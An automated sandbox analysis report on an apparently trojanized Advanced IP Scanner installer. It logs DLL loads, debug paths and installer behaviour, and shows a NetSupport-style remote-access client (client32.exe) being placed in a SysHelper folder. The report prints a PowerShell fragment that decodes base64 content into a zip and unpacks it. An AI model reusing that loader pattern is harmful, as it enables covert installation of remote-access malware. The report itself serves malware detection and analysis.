                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: dbghelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: dbgcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: pcihooks.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: riched32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: napinsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wshbth.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: nlaapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: winrnr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: pciinv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: Advanced IP Scanner for Windows.lnk.1.drLNK file: ..\..\..\..\..\..\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\SysHelper\nsm_vpro.iniJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpWindow found: window name: TSelectLanguageFormJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpAutomated click: OK
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpAutomated click: Install
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpAutomated click: Next
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exeStatic PE information: certificate valid
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exeStatic file information: File size 21426168 > 1048576
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dllJump to behavior
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.3641013558.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.2161613841.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2250587498.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp
                                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: is-50T4N.tmp.1.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: is-3DFK3.tmp.1.dr
                                  Source: Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: is-7T7KO.tmp.1.dr
                                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: is-G1AVJ.tmp.1.dr
                                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb- source: powershell.exe, 00000005.00000002.2183755399.0000000009739000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: is-37BEP.tmp.1.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr
                                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: is-8NFDN.tmp.1.dr
                                  Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: is-UUUMK.tmp.1.dr
                                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: is-JD615.tmp.1.dr
                                  Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: is-B6942.tmp.1.dr
                                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: is-GO656.tmp.1.dr
                                  Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.3640696610.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000008.00000002.2161392777.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2249977529.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr
                                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: is-MLS3P.tmp.1.dr
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdbss' source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr
                                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2132549771.0000000002D9D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr
                                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: is-3ARML.tmp.1.dr
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb"" source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp
                                  Source: Binary string: client32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: is-NMSBJ.tmp.1.dr
                                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: is-51B0J.tmp.1.dr
                                  Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: is-JV2VP.tmp.1.dr
                                  Source: Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdbt3 source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.3640885931.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000008.00000002.2161541920.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2250457017.0000000068895000.00000002.00000001.01000000.0000000D.sdmp

                                  Data Obfuscation

                                  barindex
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64Content);[System.IO.File]::WriteAllBytes($zipFileName, $decodedBytes);New-Item -ItemType Directory -Path $destinationPath;Expand-Archive -Path $zipFileName -DestinationPath $de
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,7_2_11029230
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exeStatic PE information: section name: .didata
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp.0.drStatic PE information: section name: .didata
                                  Source: is-J88P9.tmp.1.drStatic PE information: section name: .didata
                                  Source: is-LK5P7.tmp.1.drStatic PE information: section name: .didat
                                  Source: is-4DCVH.tmp.1.drStatic PE information: section name: .00cfg
                                  Source: is-R93D4.tmp.1.drStatic PE information: section name: .qtmetad
                                  Source: is-RSL5S.tmp.1.drStatic PE information: section name: .qtmetad
                                  Source: PCICL32.DLL.5.drStatic PE information: section name: .hhshare
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_030BE262 push esi; retf 5_2_030BE263
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_030BF1D0 pushad ; retf 5_2_030BF1D1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076787A8 push 0000005Dh; ret 5_2_076787CE
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07671FB2 push eax; ret 5_2_07671FB3
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07678D62 pushad ; ret 5_2_07678D63
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07676B72 push eax; ret 5_2_07676B73
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0767C86A push esp; iretd 5_2_0767C8B1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0767C801 push esp; retf 5_2_0767C831
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0767C8D0 push esp; iretd 5_2_0767C8B1
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07809CE5 push FFFFFFE8h; ret 5_2_07809CE9
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1116B825 push ecx; ret 7_2_1116B838
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11166719 push ecx; ret 7_2_1116672C
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11040641 push 3BFFFFFEh; ret 7_2_11040646
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_685C6BBF push ecx; ret 7_2_685C6BD2
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_685C4DF5 push 685C43F9h; retf 7_2_685C4E1F
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1116B825 push ecx; ret 8_2_1116B838
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11166719 push ecx; ret 8_2_1116672C
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11040641 push 3BFFFFFEh; ret 8_2_11040646
                                  Source: msvcr100.dll.5.drStatic PE information: section name: .text entropy: 6.909044922675825
